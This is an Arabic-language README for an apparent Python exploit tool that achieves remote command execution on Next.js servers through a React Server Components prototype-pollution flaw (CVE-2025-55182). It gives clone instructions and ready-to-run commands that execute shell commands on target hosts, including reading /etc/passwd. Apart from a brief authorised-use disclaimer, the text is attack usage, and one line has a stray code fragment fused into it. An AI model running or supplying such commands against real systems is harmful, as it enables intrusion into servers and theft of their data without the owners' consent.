
أداة استغلال لثغرة Next.js CVE-2025-55182 التي تسمح بتنفيذ الأوامر عن بُعد عبر تسميم النموذج الأولي في مكونات خادم React.
أداة استغلال بلغة Python لثغرة RCE في مكونات React Server الخاصة بـ Next.js مع دعم HTTP/HTTPS.
# استنساخ وتشغيل
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<أمر>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
للاستخدام في اختبار الأمان المصرح به فقط.
استخدم فقط على الأنظمة التي تملكها أو لديك إذن صريح باختبارها. لا تستخدمها أبدًا في أنشطة غير قانونية.
child_process.execSync()رخصة MIT - راجع ملف LICENSE
إخلاء مسؤول: للأغراض التعليمية فقط. احصل دائمًا على التصريح المناسب.
آخر تحديث: 8 فبراير 2025
الإصدار: 2.0.0
المُطوّر: BrianLopezM99